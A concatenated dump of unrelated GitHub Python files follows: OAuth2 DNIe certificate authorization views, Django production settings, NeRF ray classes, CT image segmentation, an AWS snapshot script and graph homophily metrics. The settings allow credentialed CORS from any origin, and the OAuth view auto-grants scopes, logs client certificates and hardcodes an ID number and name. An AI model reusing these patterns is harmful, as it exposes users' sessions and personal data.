ModelInput(**inference_information)\n \n\ndef main():\n open_channel()\n \nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"luiscal4a/TeraflowLab","sub_path":"l3_distributedattackdetector/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7519427705","text":"result = []\r\n\r\ndef back(index, rest_day, money, lst):\r\n global result\r\n \r\n\r\n for j in range(index, len(lst)):\r\n if rest_day != 0:\r\n rest_day -= 1\r\n else:\r\n if j + lst[j][0] -1 < len(lst):\r\n back(j+1, lst[j][0]-1, money + lst[j][1], lst)\r\n result.append(money)\r\n\r\nN = int(input())\r\nlst = [list(map(int,input().split())) for _ in range(N)]\r\n\r\nfor i, (consulting_day, money) in enumerate(lst):\r\n if i + consulting_day - 1 < len(lst):\r\n back(i+1, consulting_day-1, money, lst)\r\nif not result:\r\n print(0)\r\nelse:\r\n print(max(result))","repo_name":"ShinJam/Algorithm-Study","sub_path":"1주차/퇴사_종석.py","file_name":"퇴사_종석.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"32327847834","text":"SECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_BROWSER_XSS_FILTER = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = True\n\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_ALLOW_ALL_ORIGINS = True\n\nCSRF_COOKIE_DOMAIN = \".trycharlie.xyz\"\nSESSION_COOKIE_DOMAIN = \".trycharlie.xyz\"\n\nCORS_ALLOW_CREDENTIALS = True\nCORS_ALLOW_ALL_ORIGINS = True","repo_name":"sftchance/charlie","sub_path":"api/api/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"13967965649","text":"from django.views.generic import View\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.utils.decorators import method_decorator\nfrom apps.web.decorators import validate_request\nfrom apps.web.responsetypes import factory\nfrom apps.web.forms import AuthorizeForm\nfrom apps.tokens.models import OAuthScope\nfrom apps.credentials.models import OAuthUser\nimport logging\nlogger = logging.getLogger('views')\n\n\nclass DNIe:\n def __init__(self, commonName, givenName, surname, serialNumber, c, certStart=None, certEnd=None):\n self.commonName = commonName\n self.givenName = givenName\n self.surname = surname\n self.serialNumber = serialNumber\n self.c = c\n self.certStart = certStart\n self.certEnd = certEnd\n\n def __str__(self):\n # logger.debug('CN: %s' %(self.commonName))\n # logger.debug('GN: %s' %(self.givenName))\n # logger.debug('SN: %s' %(self.surname))\n # logger.debug('serial: %s' %(self.serialNumber)) \n # logger.debug('C: %s' %(self.c))\n # logger.debug('certStart: %s' %(self.certStart))\n # logger.debug('certEnd: %s' %(self.certEnd))\n logger.debug('|-- CN: %s --- GN: %s --- SN: %s --- serialNumber: %s --- C: %s -- certStart: %s -- certEnd: %s --|' % (self.commonName, self.givenName, self.surname, self.serialNumber, self.c, self.certStart, self.certEnd))\n return '|-- CN: %s --- GN: %s --- SN: %s --- serialNumber: %s --- C: %s -- certStart: %s -- certEnd: %s --|' % (self.commonName, self.givenName, self.surname, self.serialNumber, self.c, self.certStart, self.certEnd)\n\n\ndef get_dni_info_from_ssl(request):\n ssl_client_s_dn = request.META['SSL_CLIENT_S_DN']\n ssl_client_s_dn = ssl_client_s_dn.replace('\\,', 'XXXCOMAXXX')\n params = dict(u.split(\"=\") for u in ssl_client_s_dn.split(\",\"))\n for param in params:\n params[param] = params[param].replace('XXXCOMAXXX', ',')\n certStart = request.META['SSL_CLIENT_V_START']\n certEnd = request.META['SSL_CLIENT_V_END']\n strlogger = '*%s, %s*' %(certStart, certEnd)\n logger.warn(strlogger)\n return DNIe(params['CN'], params['GN'], params['SN'], params['serialNumber'], params['C'], certStart, certEnd)\n\n\nclass AuthorizeView(View):\n form_class = AuthorizeForm\n initial = {}\n template_name = 'web/authorize.html'\n\n @method_decorator(validate_request)\n def dispatch(self, *args, **kwargs):\n \"\"\"\n Decorating the dispatch method decorates all methods.\n So both get and post will have the decorator applied.\n \"\"\"\n logger.debug('dispatch')\n return super(AuthorizeView, self).dispatch(*args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n logger.debug('en get_AuthorizeView')\n form = self.form_class(initial=self.initial)\n try:\n logger.debug('en get')\n prueba = request.META['SSL_CLIENT_S_DN']\n logger.debug('prueba: *' + prueba + '*')\n claves = [\n #'HTTPS'\n 'SSL_PROTOCOL'\n # ,'SSL_SESSION_ID'\n ,'SSL_SESSION_RESUMED'\n ,'SSL_SECURE_RENEG'\n ,'SSL_CIPHER'\n ,'SSL_CIPHER_EXPORT'\n ,'SSL_CIPHER_USEKEYSIZE'\n ,'SSL_CIPHER_ALGKEYSIZE'\n ,'SSL_COMPRESS_METHOD'\n ,'SSL_VERSION_INTERFACE'\n ,'SSL_VERSION_LIBRARY'\n ,'SSL_CLIENT_M_VERSION'\n ,'SSL_CLIENT_M_SERIAL'\n ,'SSL_CLIENT_S_DN'\n # ,'SSL_CLIENT_S_DN_x509'\n # ,'SSL_CLIENT_SAN_Email_n'\n # ,'SSL_CLIENT_SAN_DNS_n'\n # ,'SSL_CLIENT_SAN_OTHER_msUPN_n'\n ,'SSL_CLIENT_I_DN'\n # ,'SSL_CLIENT_I_DN_x509'\n ,'SSL_CLIENT_V_START'\n ,'SSL_CLIENT_V_END'\n ,'SSL_CLIENT_V_REMAIN'\n ,'SSL_CLIENT_A_SIG'\n ,'SSL_CLIENT_A_KEY'\n ,'SSL_CLIENT_CERT'\n # ,'SSL_CLIENT_CERT_CHAIN_n'\n # ,'SSL_CLIENT_CERT_RFC4523_CEA'\n ,'SSL_CLIENT_VERIFY'\n ,'SSL_SERVER_M_VERSION'\n ,'SSL_SERVER_M_SERIAL'\n ,'SSL_SERVER_S_DN'\n # ,'SSL_SERVER_SAN_Email_n'\n # ,'SSL_SERVER_SAN_DNS_n'\n # ,'SSL_SERVER_SAN_OTHER_dnsSRV_n'\n # ,'SSL_SERVER_S_DN_x509'\n ,'SSL_SERVER_I_DN'\n # ,'SSL_SERVER_I_DN_x509'\n ,'SSL_SERVER_V_START'\n ,'SSL_SERVER_V_END'\n ,'SSL_SERVER_A_SIG'\n ,'SSL_SERVER_A_KEY'\n ,'SSL_SERVER_CERT'\n # ,'SSL_SRP_USER'\n # ,'SSL_SRP_USERINFO'\n # ,'SSL_TLS_SNI']\n ]\n for k in claves:\n try:\n logger.warn(k+': '+str(request.META[k]))\n except Exception as ex:\n logger.warn(k+': no funciona esto de recorrer el meta')\n logger.warn(ex)\n\n\n dnie = get_dni_info_from_ssl(request)\n except Exception as e:\n logger.warn('get_No vienen las credenciales del DNIe')\n\n return self._render(request=request, form=form, dnie=dnie)\n\n def post(self, request, *args, **kwargs):\n logger.debug('en post_AuthorizeView')\n form = self.form_class(request.POST)\n\n mstring = []\n for key in request.POST.iterkeys():\n valuelist = request.POST.getlist(key)\n mstring.extend(['%s=%s' % (key, val) for val in valuelist])\n msg = ','.join(mstring)\n logger.debug(msg)\n try:\n logger.debug(request.POST['client_type'])\n #logger.debug(request.client_type)\n # Si la peticion viene desde la app Android, vamos por otro camino\n #if request.client_type == 'androidnfcapp':\n if request.POST['client_type'] == 'androidnfcapp':\n return self.post_android_app(request, *args, **kwargs)\n\n except Exception as e:\n logger.warn('Excepcion: ' + e.message)\n\n claves = [\n #'HTTPS'\n 'SSL_PROTOCOL'\n # ,'SSL_SESSION_ID'\n ,'SSL_SESSION_RESUMED'\n ,'SSL_SECURE_RENEG'\n ,'SSL_CIPHER'\n ,'SSL_CIPHER_EXPORT'\n ,'SSL_CIPHER_USEKEYSIZE'\n ,'SSL_CIPHER_ALGKEYSIZE'\n ,'SSL_COMPRESS_METHOD'\n ,'SSL_VERSION_INTERFACE'\n ,'SSL_VERSION_LIBRARY'\n ,'SSL_CLIENT_M_VERSION'\n ,'SSL_CLIENT_M_SERIAL'\n ,'SSL_CLIENT_S_DN'\n # ,'SSL_CLIENT_S_DN_x509'\n # ,'SSL_CLIENT_SAN_Email_n'\n # ,'SSL_CLIENT_SAN_DNS_n'\n # ,'SSL_CLIENT_SAN_OTHER_msUPN_n'\n ,'SSL_CLIENT_I_DN'\n # ,'SSL_CLIENT_I_DN_x509'\n ,'SSL_CLIENT_V_START'\n ,'SSL_CLIENT_V_END'\n ,'SSL_CLIENT_V_REMAIN'\n ,'SSL_CLIENT_A_SIG'\n ,'SSL_CLIENT_A_KEY'\n ,'SSL_CLIENT_CERT'\n # ,'SSL_CLIENT_CERT_CHAIN_n'\n # ,'SSL_CLIENT_CERT_RFC4523_CEA'\n ,'SSL_CLIENT_VERIFY'\n ,'SSL_SERVER_M_VERSION'\n ,'SSL_SERVER_M_SERIAL'\n ,'SSL_SERVER_S_DN'\n # ,'SSL_SERVER_SAN_Email_n'\n # ,'SSL_SERVER_SAN_DNS_n'\n # ,'SSL_SERVER_SAN_OTHER_dnsSRV_n'\n # ,'SSL_SERVER_S_DN_x509'\n ,'SSL_SERVER_I_DN'\n # ,'SSL_SERVER_I_DN_x509'\n ,'SSL_SERVER_V_START'\n ,'SSL_SERVER_V_END'\n ,'SSL_SERVER_A_SIG'\n ,'SSL_SERVER_A_KEY'\n ,'SSL_SERVER_CERT'\n # ,'SSL_SRP_USER'\n # ,'SSL_SRP_USERINFO'\n # ,'SSL_TLS_SNI']\n ]\n for k in claves:\n try:\n logger.warn(k+': '+str(request.META[k]))\n except Exception as ex:\n logger.warn(k+': no funciona esto de recorrer el meta')\n logger.warn(ex)\n try:\n logger.debug('enn post')\n prueba = request.META['SSL_CLIENT_S_DN']\n logger.debug('prueba: *' + prueba + '*')\n dnie = get_dni_info_from_ssl(request)\n logger.debug('dnie: *' + str(dnie) + '*')\n except Exception as e:\n logger.warn('post_No vienen las credenciales del DNIe')\n logger.warn(e)\n dnie = None\n\n logger.debug('form.is_valid' + str(form.is_valid()))\n if not form.is_valid():\n return self._render(request=request, form=form)\n\n logger.debug('hhhhhhhhhhhhhhhhhhhhhhh: ' + request.redirect_uri + ', request.response_type = ' + request.response_type)\n return factory(response_type=request.response_type).process(\n client=request.client,\n authorized=form.cleaned_data['authorize'],\n scopes=form.cleaned_data['scopes'],\n redirect_uri=request.redirect_uri,\n state=request.state,\n dnie=dnie\n )\n\n def post_android_app(self, request, *args, **kwargs):\n # Si la peticion viene desde la App de Android, tenemos que tratar la respuesta de forma diferente.\n try:\n logger.debug('enn post_android_app')\n prueba = request.META['SSL_CLIENT_S_DN']\n logger.debug('prueba: *' + prueba + '*')\n dnie = get_dni_info_from_ssl(request)\n logger.debug('dnie: *' + str(dnie) + '*')\n except Exception as e:\n logger.warn('No vienen las credenciales del DNIe')\n dnie = None\n\n authorized = True\n try:\n # Si la peticion viene desde la app Android, vamos por otro camino\n #if request.step == '1':\n if request.POST['step'] == '1':\n logger.debug('request.POST[\"step\"]: ' + request.POST['step'])\n permisosObj = OAuthScope.objects.all()\n from django.core import serializers\n data = serializers.serialize('json', permisosObj)\n logger.debug(data)\n from django.http import HttpResponse\n return HttpResponse(data, content_type='application/json')\n\n except Exception as e:\n logger.error('Exception: ' + e.message)\n return None\n\n # Los scopes deben venir de la peticion del cliente Android, pero por ahora simulamos que se acepta todos\n permisosObj = OAuthScope.objects.all()\n scopes = [1,2]\n\n logger.debug('redirect_uri: ' + request.redirect_uri)\n logger.debug('request.response_type('+request.response_type+')')\n logger.debug('request.client('+str(request.client)+')')\n logger.debug('authorized('+str(authorized)+')')\n logger.debug('scopes('+str(scopes)+')')\n logger.debug('request.redirect_uri('+str(request.redirect_uri)+')')\n logger.debug('state='+str(request.state)+'')\n logger.debug('dnie='+str(dnie)+'')\n logger.debug('client_type='+str(request.POST[\"client_type\"])+'')\n try:\n return factory(response_type=request.response_type).process(\n client=request.client,\n authorized=authorized,\n scopes=scopes,\n redirect_uri=request.redirect_uri,\n state=request.state,\n dnie=dnie,\n client_type=request.POST['client_type']\n )\n except Exception as e:\n logger.error(e.message)\n logger.error(e)\n\n def _render(self, request, form, dnie=None, cadena=None, prueba=None):\n return HttpResponse(render(request, self.template_name, {\n 'title': 'Authorize', 'client': request.client,\n 'form': form, 'scopes': OAuthScope.objects.all(), 'prueba': prueba, 'dnie': dnie, 'prueba': prueba}))\n\n # def _render(self, request, form):\n # return HttpResponse(render(request, self.template_name, {\n # 'title': 'Authorize', 'client': request.client,\n # 'form': form, 'scopes': OAuthScope.objects.all()}))\n\n\nfrom apps.tokens.decorators import authentication_required\nimport json\n\n\ndef me_view(request, *args, **kwargs):\n logger.debug('me_view <--------------------------')\n from rest_framework.response import Response\n data = {\n 'id': '53159931P',\n 'name': 'Carlos Jimenez',\n 'email': 'mi@email.com',\n }\n return HttpResponse(\n json.dumps(data),\n content_type='application/json',\n )\n","repo_name":"Betisman/pfc-carlosjg","sub_path":"src/oauth2server/oauth2server/apps/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"722214657","text":"import contextlib\nfrom View.base_screen import BaseScreenView\n\n\nclass MainScreenView(BaseScreenView):\n '''Implements the login start screen in the user application.'''\n\n def __init__(self, **kw):\n super().__init__(**kw)\n self.model.add_observer(self)\n self.ids.maintopbar.title = self.controller.get_serial_number()\n self.app.serial_number = self.ids.maintopbar.title\n\n def model_is_changed(self) -> None:\n\n '''\n Called whenever any change has occurred in the data model.\n The view in this method tracks these changes and updates the UI\n according to these changes.\n '''\n\n status = self.model.device_status\n with contextlib.suppress(Exception):\n self.ids.temperature.text = f'Температура термоблока:\\\n \\n {self.model.tb_temperature[0]}°C'\n self.ids.device_status.text = (\n 'Состояние прибора:\\n готов'\n if int(status) == 5\n else 'Состояние прибора:\\n прогрев'\n )\n\n def on_enter(self, *args):\n self.set_screen_is_active(True)\n self.controller.get_device_status()\n\n if self.app.user_login is None:\n self.ids.name_label.text = 'Пользователь: Гость'\n else:\n self.ids.name_label.text = f'Пользователь: {self.app.user_login}'\n\n def callback(self, instance):\n if instance.icon == 'power':\n quit()\n if instance.icon == 'arrow-up-drop-circle-outline':\n self.controller.tb_movement()\n\n def set_screen_is_active(self, state):\n self.controller.set_screen_is_active(state)\n","repo_name":"black0rainbovv/DT_Interface","sub_path":"View/MainScreen/main_screen.py","file_name":"main_screen.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20767666866","text":"from dataclasses import dataclass\nfrom typing import Callable\n\nimport paddle\n\nfrom pprndr.cameras.math_functionals import (Gaussians,\n conical_frustum_to_gaussian)\n\n__all__ = [\"RayBundle\", \"Frustums\", \"RaySamples\"]\n\n\nclass Frustums(object):\n \"\"\"\n Args:\n origins: Ray origins. Shape: [num_rays, num_samples, 3] or [num_total_samples, 3].\n directions: Ray directions. Shape: [num_rays, num_samples, 3] or [num_total_samples, 3].\n starts: Where each frustum starts along a ray. Shape: [num_rays, num_samples, 1] or [num_total_samples, 1].\n ends: Where each frustum ends along a ray. Shape: [num_rays, num_samples, 1] or [num_total_samples, 1].\n pixel_area: Pixel areas at a distance 1 from ray origins.\n Shape: [num_rays, num_samples, 1] or [num_total_samples, 1].\n positions: Coordinates of samples along the rays.\n Shape: [num_rays, num_samples, 3] or [num_total_samples, 3].\n offsets: Offsets for each sample position wrt. to the center of the frustum.\n Shape: [num_rays, num_samples, 3] or [num_total_samples, 3].\n \"\"\"\n\n def __init__(self,\n origins: paddle.Tensor,\n directions: paddle.Tensor,\n starts: paddle.Tensor,\n ends: paddle.Tensor,\n pixel_area: paddle.Tensor = None,\n positions: paddle.Tensor = None,\n offsets: paddle.Tensor = None):\n self.origins = origins\n self.directions = directions\n self.starts = starts\n self.ends = ends\n self.pixel_area = pixel_area\n self.offsets = offsets\n\n if positions is not None:\n self._positions = positions\n\n @property\n def deltas(self):\n return self.ends - self.starts\n\n @property\n def positions(self) -> paddle.Tensor:\n if hasattr(self, \"_positions\"):\n return self._positions\n else:\n positions = self.origins + self.directions * (\n self.starts + self.ends) / 2.0\n if self.offsets is not None:\n positions += self.offsets\n return positions\n\n @property\n def gaussians(self) -> Gaussians:\n \"\"\"\n Calculates guassian approximation of conical frustum.\n Returns:\n Conical frustums approximated by gaussian distribution.\n \"\"\"\n\n return conical_frustum_to_gaussian(\n origins=self.origins,\n directions=self.directions,\n starts=self.starts,\n ends=self.ends,\n pixel_area=self.pixel_area)\n\n\n@dataclass\nclass RaySamples:\n frustums: Frustums\n \"\"\"Frustums for each ray sample.\"\"\"\n camera_ids: paddle.Tensor = None\n \"\"\"Camera ids for each ray sample. Shape: [num_rays, num_samples, 1] or [num_total_samples, 1]\"\"\"\n spacing_bins: paddle.Tensor = None\n \"\"\"Spacing bins for each ray sample. Only available if samples are not packed. Shape: [num_rays, num_samples + 1, 1]\n \"\"\"\n spacing2euclidean_fn: Callable = None\n \"\"\"Function to convert positions in spacing domain to euclidean domain. Only available if samples are not packed.\"\"\"\n packed_info: paddle.Tensor = None\n \"\"\"Packed info for each ray sample Only available if samples are packed. Shape: [num_rays, 2]\"\"\"\n ray_indices: paddle.Tensor = None\n \"\"\"Ray indices for each ray sample. Only available if samples are packed. Shape: [num_total_samples, 1]\"\"\"\n\n @property\n def spacing_starts(self):\n return self.spacing_bins[..., :-1, :]\n\n @property\n def spacing_ends(self):\n return self.spacing_bins[..., 1:, :]\n\n\n@dataclass\nclass RayBundle:\n origins: paddle.Tensor\n \"\"\"Ray origins. Shape: [num_rays, 3].\"\"\"\n directions: paddle.Tensor\n \"\"\"Ray directions. Shape: [num_rays, 3].\"\"\"\n pixel_area: paddle.Tensor\n \"\"\"Pixel areas at a distance 1 from ray origins. Shape: [num_rays, 1].\"\"\"\n camera_ids: paddle.Tensor\n \"\"\"Camera ids for each ray. Shape: [num_rays, 1].\"\"\"\n\n @property\n def num_rays(self):\n return len(self.origins)\n\n def __len__(self):\n return self.num_rays\n\n def __getitem__(self, indices) -> \"RayBundle\":\n return RayBundle(\n origins=self.origins[indices],\n directions=self.directions[indices],\n pixel_area=self.pixel_area[indices],\n camera_ids=self.camera_ids[indices])\n\n def generate_ray_samples(\n self,\n euclidean_bins: paddle.Tensor,\n spacing_bins: paddle.Tensor,\n spacing2euclidean_fn: Callable = None) -> RaySamples:\n n_smaples_per_ray = euclidean_bins.shape[-2] - 1\n\n ray_bundle = self[..., None, :]\n\n frustums = Frustums(\n origins=ray_bundle.origins.repeat_interleave(\n n_smaples_per_ray, axis=-2),\n directions=ray_bundle.directions.repeat_interleave(\n n_smaples_per_ray, axis=-2),\n starts=euclidean_bins[..., :-1, :],\n ends=euclidean_bins[..., 1:, :],\n pixel_area=ray_bundle.pixel_area.repeat_interleave(\n n_smaples_per_ray, axis=-2))\n ray_samples = RaySamples(\n frustums=frustums,\n camera_ids=ray_bundle.camera_ids.repeat_interleave(\n n_smaples_per_ray, axis=-2),\n spacing_bins=spacing_bins,\n spacing2euclidean_fn=spacing2euclidean_fn)\n return ray_samples\n","repo_name":"sayoriaaa/ddl-project","sub_path":"pprndr/cameras/rays.py","file_name":"rays.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20595886238","text":"import pydicom\nimport numpy as np\nimport cv2\nimport os\nimport matplotlib.pyplot as plt\nimport scipy\nfrom scipy import ndimage\nfrom skimage import morphology\n\n\ndef window_image(image, window_center, window_width):\n img_min = window_center - window_width // 2 # use the double slash // operator to perform floor division\n img_max = window_center + window_width // 2\n window_image = image.copy()\n window_image[window_image < img_min] = img_min\n window_image[window_image > img_max] = img_max\n smallest_window = window_image.min(axis=(0, 1))\n largest_window = window_image.max(axis=(0, 1))\n print(\"wmin / wmax\", smallest_window, largest_window)\n print(\"window\", window_image.shape)\n return window_image\n\n\ndef transform_to_hu(medical_image, image):\n intercept = medical_image.RescaleIntercept\n slope = medical_image.RescaleSlope\n hu_image = image * slope + intercept\n print(\"hu\", hu_image.shape)\n return hu_image\n\n\ndef remove_noise(medical_image):\n image = medical_image.pixel_array\n smallest_image = image.min(axis=(0, 1))\n largest_image = image.max(axis=(0, 1))\n print(\"imin / imax\", smallest_image, largest_image)\n print(\"image\", image.shape)\n hu_image = transform_to_hu(medical_image, image)\n smallest_hu = hu_image.min(axis=(0, 1))\n largest_hu = hu_image.max(axis=(0, 1))\n print(\"hmin / hmax\", smallest_hu, largest_hu)\n brain_img = window_image(hu_image, 40, 80)\n smallest_brain = brain_img.min(axis=(0, 1))\n largest_brain = brain_img.max(axis=(0, 1))\n print(\"bmin / bmax\", smallest_brain, largest_brain)\n print(\"brain\", brain_img.shape)\n segmentation = morphology.dilation(brain_img, np.ones((1, 1)))\n labels, label_nb = ndimage.label(segmentation)\n label_count = np.bincount(labels.ravel().astype(int))\n label_count[0] = 0\n mask = labels == label_count.argmax()\n\n mask = morphology.dilation(mask, np.ones((1, 1)))\n mask = scipy.ndimage.binary_fill_holes(mask)\n mask = morphology.dilation(mask, np.ones((3, 3)))\n masked_image = mask * brain_img\n print(\"masked\", masked_image.shape)\n return mask, masked_image, brain_img\n\n\npath = \"data/test/patient40/CT000001.dcm\"\nmedical_image = pydicom.read_file(path)\nplt.subplot(1,4,1)\nplt.title('original')\nplt.style.use('grayscale')\nplt.imshow(medical_image.pixel_array)\nplt.plot()\n\nmask, masked_image, brain_img = remove_noise(medical_image)\nplt.subplot(1,4,2)\nplt.style.use('grayscale')\nplt.title('mask')\nplt.imshow(mask)\nplt.plot()\n\nplt.subplot(1,4,3)\nplt.imshow(masked_image)\nplt.title('segmented image')\nplt.plot()\n\nplt.subplot(1,4,4)\nplt.imshow(brain_img)\nplt.title('brain image')\nplt.plot()\nplt.show()\n\n","repo_name":"RavzaTk/UNETSegmentationonCTScanImagesmodel2","sub_path":"segmentasyon_deneme.py","file_name":"segmentasyon_deneme.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40259735127","text":"import boto3\nimport schedule\n\nec2_client = boto3.client('ec2')\n\nvolumes = ec2_client.describe_volumes(\n Filters=[\n {\n 'Name': 'tag:Name',\n 'Values': [\n 'prod'\n ]\n }\n ]\n )\n\nfor volume in volumes['Volumes']:\n new_snapshots = ec2_client.create_snapshot(\n VolumeId=volume['VolumeId']\n )\n print(f\"Volume ID: {volume['VolumeId']} Snapshot ID: {new_snapshots['SnapshotId']}\\n\")\n","repo_name":"mohamaddayoub/python-aws","sub_path":"snapshot-specific-volume.py","file_name":"snapshot-specific-volume.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"656535653","text":"import math\nimport random\nimport time\n\nimport numpy as np\nimport scipy\nimport torch\nfrom scipy.stats import ttest_ind\nfrom sklearn import svm\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.naive_bayes import GaussianNB\nfrom torch_scatter import scatter_add\n\nfrom utils.util_funcs import random_disassortative_splits, accuracy\n\npi = math.pi\nif torch.cuda.is_available():\n device = 'cuda:0'\nelse:\n device = 'cpu'\ndevice = torch.device(device)\n\n\ndef remove_self_loops(edge_index, edge_attr=None):\n r\"\"\"Removes every self-loop in the graph given by :attr:`edge_index`, so\n that :math:`(i,i) \\not\\in \\mathcal{E}` for every :math:`i \\in \\mathcal{V}`.\n\n Args:\n edge_index (LongTensor): The edge indices.\n edge_attr (Tensor, optional): Edge weights or multi-dimensional\n edge features. (default: :obj:`None`)\n\n :rtype: (:class:`LongTensor`, :class:`Tensor`)\n \"\"\"\n row, col = edge_index[0], edge_index[1]\n mask = row != col\n edge_attr = edge_attr if edge_attr is None else edge_attr[mask]\n edge_index = edge_index[:, mask]\n\n return edge_index, edge_attr\n\n\ndef edge_homophily(A, labels, ignore_negative=False):\n \"\"\" gives edge homophily, i.e. proportion of edges that are intra-class\n compute homophily of classes in labels vector\n See Zhu et al. 2020 \"Beyond Homophily ...\"\n if ignore_negative = True, then only compute for edges where nodes both have\n nonnegative class labels (negative class labels are treated as missing\n \"\"\"\n src_node, targ_node = A.coalesce().indices()[0, :], A.coalesce().indices()[1, :] # A.nonzero()\n matching = labels[src_node] == labels[targ_node]\n labeled_mask = (labels[src_node] >= 0) * (labels[targ_node] >= 0)\n if ignore_negative:\n edge_hom = np.mean(matching[labeled_mask])\n else:\n edge_hom = torch.mean(matching.float())\n return edge_hom\n\n\ndef node_homophily(A, labels):\n \"\"\" average of homophily for each node\n \"\"\"\n src_node = A.coalesce().indices()[0, :]\n targ_node = A.coalesce().indices()[1, :]\n edge_idx = torch.tensor(np.vstack((src_node, targ_node)), dtype=torch.long).contiguous()\n labels = torch.tensor(labels)\n num_nodes = A.shape[0]\n return node_homophily_edge_idx(edge_idx, labels, num_nodes)\n\n\ndef node_homophily_edge_idx(edge_idx, labels, num_nodes):\n \"\"\" edge_idx is 2 x(number edges) \"\"\"\n edge_index = remove_self_loops(edge_idx)[0]\n hs = torch.zeros(num_nodes)\n degs = torch.bincount(edge_index[0, :]).float()\n matches = (labels[edge_index[0, :]] == labels[edge_index[1, :]]).float()\n hs = hs.scatter_add(0, edge_index[0, :], matches) / degs\n return hs[degs != 0].mean()\n\n\ndef compact_matrix_edge_idx(edge_idx, labels):\n \"\"\"\n c x c compatibility matrix, where c is number of classes\n H[i,j] is proportion of endpoints that are class j \n of edges incident to class i nodes \n \"Generalizing GNNs Beyond Homophily\"\n treats negative labels as unlabeled\n \"\"\"\n edge_index = remove_self_loops(edge_idx.to(device))[0]\n src_node, targ_node = edge_index[0, :], edge_index[1, :]\n labeled_nodes = (labels[src_node] >= 0) * (labels[targ_node] >= 0)\n label = labels.squeeze()\n c = label.max() + 1\n H = torch.zeros((c, c)).to(edge_index.to(device))\n src_label = label[src_node[labeled_nodes]]\n targ_label = label[targ_node[labeled_nodes]]\n for k in range(c):\n sum_idx = torch.where(src_label == k)[0]\n add_idx = targ_label[sum_idx]\n scatter_add(torch.ones_like(add_idx).to(H.dtype), add_idx, out=H[k, :], dim=-1)\n H = H / torch.sum(H, axis=1, keepdims=True)\n return H\n\n\ndef our_measure(edge_index, label):\n \"\"\" \n our measure \\hat{h}\n treats negative labels as unlabeled \n \"\"\"\n label = label.squeeze()\n c = label.max() + 1\n H = compact_matrix_edge_idx(edge_index.to(device), label.to(device))\n nonzero_label = label[label >= 0]\n counts = nonzero_label.unique(return_counts=True)[1]\n proportions = counts.float() / nonzero_label.shape[0]\n val = 0\n for k in range(c):\n class_add = torch.clamp(H[k, k] - proportions[k], min=0)\n if not torch.isnan(class_add):\n # only add if not nan\n val += class_add\n val /= c - 1\n return val\n\n\ndef class_distribution(A, labels):\n edge_index = A.coalesce().indices()\n src_node, targ_node = edge_index[0, :], edge_index[1, :]\n deg = src_node.unique(return_counts=True)[1]\n\n # remove self-loop\n deg = deg - 1\n edge_index = remove_self_loops(A.coalesce().indices())[0]\n src_node, targ_node = edge_index[0, :], edge_index[1, :]\n\n labels = labels.squeeze()\n p = labels.unique(return_counts=True)[1] / labels.shape[0]\n p_bar = torch.zeros(labels.max() + 1)\n pc = torch.zeros((labels.max() + 1, labels.max() + 1))\n for i in range(labels.max() + 1):\n p_bar[i] = torch.sum(deg[torch.where(labels == i)])\n\n for j in range(labels.max() + 1):\n pc[i, j] = torch.sum(labels[targ_node[torch.where(labels[src_node] == i)]] == j)\n p_bar, pc = p_bar / torch.sum(deg), pc / torch.sum(deg)\n p_bar[torch.where(p_bar == 0)], pc[torch.where(pc == 0)] = 1e-8, 1e-8\n return p, p_bar, pc\n\n\ndef adjusted_homo(A, label):\n p, p_bar, pc = class_distribution(A, label)\n edge_homo = edge_homophily(A, label)\n adj_homo = (edge_homo - torch.sum(p_bar ** 2)) / (1 - torch.sum(p_bar ** 2))\n\n return adj_homo\n\n\ndef label_informativeness(A, label):\n p, p_bar, pc = class_distribution(A, label)\n LI = 2 - torch.sum(pc * torch.log(pc)) / torch.sum(p_bar * torch.log(p_bar))\n return LI\n\n\ndef generalized_edge_homophily(adj, features, label, sample_max=75000, iteration=10):\n nedges = adj.coalesce().indices()[0, :].shape[0]\n if nedges < sample_max:\n sim = torch.tensor(cosine_similarity(features.cpu(), features.cpu())).to(device)\n sim[torch.isnan(sim)] = 0\n adj = adj.to_dense()\n adj = adj - torch.diag(torch.diag(adj))\n adj = (adj > 0).float()\n g_edge_homo = torch.sum(sim * adj) / torch.sum(adj)\n\n return g_edge_homo\n else:\n g_homo = np.zeros(iteration)\n\n for i in range(iteration):\n sample = torch.tensor(\n random.sample(list(np.arange(adj.coalesce().indices()[0, :].shape[0])), int(sample_max)))\n src_node, targ_node = adj.coalesce().indices()[0, :][sample], adj.coalesce().indices()[1, :][sample]\n sim = torch.sum(features[src_node].cpu() * features[targ_node].cpu(), 1) / \\\n (torch.norm(features[src_node].cpu(), dim=1, p=2) *\n torch.norm(features[targ_node].cpu(), dim=1, p=2))\n sim[torch.isnan(sim)] = 0\n g_homo[i] = torch.mean(sim)\n return np.mean(g_homo)\n\n\ndef similarity(features, adj, label, hard=None, LP=1, ifsum=1, idx_train=None):\n if str(type(idx_train)) == '':\n inner_prod = torch.mm(torch.mm(adj, features), torch.mm(adj, features).transpose(0, 1))\n labels = torch.argmax(label, 1)\n weight_matrix = (torch.zeros(adj.clone().detach().size(0), labels.clone().detach().max() 